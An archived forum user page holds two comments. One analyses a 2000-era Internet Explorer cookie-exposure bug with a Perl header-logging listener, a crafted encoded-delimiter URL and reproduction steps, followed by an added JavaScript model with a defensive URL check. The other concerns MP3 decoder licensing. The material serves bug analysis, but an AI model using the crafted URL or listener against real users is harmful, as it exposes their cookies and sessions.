Slashdot Mirror


User: spifman

spifman's activity in the archive.

Stories: 0
Comments: 2

Comments · 2

  1. This Exploit Doesn't Send Wrong Cookies To Server on MSIE's Cookies Are Public · · Score: 1

    The bug is only in the client-side javascript (i.e. your other-site cookies AREN'T sent to this site). Consider this bit of perl code:

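    #!/usr/bin/perl -w
    # Minimal one-connection-at-a-time HTTP listener: prints each request's
    # headers (including any Cookie: line) and returns a fixed page.

    use strict;
    use IO::Socket::INET;

    # Port 80 needs root privileges.
    my $socket = IO::Socket::INET->new(Listen => 30, LocalPort => 80, Proto => 'tcp')
        or die "cannot listen on port 80: $@\n";

    $| = 1;    # unbuffered STDOUT so request lines show up immediately
    $socket->listen();
    my $newsock = undef;
    while ($newsock = $socket->accept()) {
        my $getNext = 1;
        my $line = '';
        # Echo the request headers; the blank line ends them.
        while ($getNext && ($line = $newsock->getline())) {
            print $line;
            chomp $line;
            if (length $line < 2) {
                $getNext = 0;
            }
        }
        print "***done****\n";
        # Canned response whose script writes document.cookie into the page.
        my $foo = <<EOS;
    HTTP/1.1 200 OK
    Date: Thu, 11 May 2000 19:33:11 GMT
    Server: Apache/1.3.0 (Unix)
    Last-Modified: Thu, 11 May 2000 04:19:57 GMT
    ETag: "23a5f-82-391a34ed"
    Accept-Ranges: bytes
    Content-Length: 130
    Connection: close
    Content-Type: text/html

    The value of your cookie for the domain you entered is:<br>
    <script>
    document.write('<b>' + document.cookie + '</b>');
    </script>
    EOS
        $newsock->print($foo);
        $newsock->close();    # the response says Connection: close
    }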

    I lifted the response by telnetting to www.peacefire.org and issuing a:

    GET /security/iecookies/showcookie.html?.foo.com/ HTTP/1.0

    Follow these steps to see that your cookies aren't being sent:
    * turn on cookies in your ie5 browser
    * pick two sites that issue cookies and visit those sites to make sure the cookies are set
    * run the above perl script (as root, it's on port 80) on your favourite box
    * set up a hosts file on your windows box for www.firstsiteyoupicked.com to point to the box you're running the perl script on
    * go to http://www.firstsiteyoupicked.com%2ffoo.html%3F.secondsiteyoupicked.com/
    * you'll note that IE dutifully sent the cookies from firstsiteyoupicked.com to the web server (see output of the perl script)
    * you'll also note that in your IE5 window the cookies for secondsiteyoupicked.com show up.

    So, I think this shows that it is a client-side only bug (but a bug nonetheless).
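
Added example, not part of spifman's comment: a JavaScript model of how the host used for the request and the host used for cookie scope can diverge on a URL shaped like the one in the steps above, plus a check a proxy or URL validator can apply. That the request side decodes `%2f`/`%3F` before splitting while the cookie side tail-matches the undecoded authority is an assumption consistent with what the comment observed; the `.example` host names and all function names are constructed for illustration.

```javascript
'use strict';

// Constructed URL shaped like the one in the steps above (placeholder hosts).
const SAMPLE = 'http://www.firstsite.example%2ffoo.html%3F.secondsite.example/';

// Authority as written: everything between "//" and the first literal / ? or #.
function rawAuthority(url) {
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/?#]*)/i.exec(url);
  if (!m) throw new Error('not a hierarchical URL: ' + url);
  return m[1];
}

// Model of the request side (assumption): encoded delimiters are decoded
// before the host is split off, so %2f ends the host name.
function requestHost(url) {
  const decoded = url.replace(/%2f/gi, '/').replace(/%3f/gi, '?').replace(/%23/gi, '#');
  return rawAuthority(decoded).toLowerCase();
}

// Model of the cookie side (assumption): the undecoded authority is used.
function cookieScopeHost(url) {
  return rawAuthority(url).toLowerCase();
}

// Cookie-style tail match: host equals the domain or ends with "." + domain.
function domainMatches(host, cookieDomain) {
  const d = cookieDomain.replace(/^\./, '').toLowerCase();
  return host === d || host.endsWith('.' + d);
}

// Defensive check for a proxy, filter or URL validator: an encoded delimiter
// inside the authority is exactly where the two models disagree, so reject it.
function hasEncodedDelimiterInAuthority(url) {
  return /%(2f|3f|23|40|5c)/i.test(rawAuthority(url));
}

// Summarise which host each side sees and whether they agree.
function analyse(url) {
  const req = requestHost(url);
  const scope = cookieScopeHost(url);
  return { requestHost: req, cookieScopeHost: scope, consistent: req === scope,
           reject: hasEncodedDelimiterInAuthority(url) };
}

console.log(analyse(SAMPLE));
console.log(domainMatches(cookieScopeHost(SAMPLE), '.secondsite.example'));
```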

  2. Try freeamp? on Ask Slashdot: Full Shoutcast on Linux? · · Score: 1
    Unfortunately, mpg123 is not GPL, so we can't use it (and we believe splay (which is GPL) is based too heavily on amp, which means if we use it in our software it could leave us open to a lawsuit from the people who now own amp).

    As far as working on the speed of the decoder, we have someone doing that. Unfortunately, writing hand-optimized assembly is not something that happens overnight. I personally would rather work on other stuff while this other guy we have works on the optimization.

    I am personally interested in seeing what engine X11amp uses whenever they release.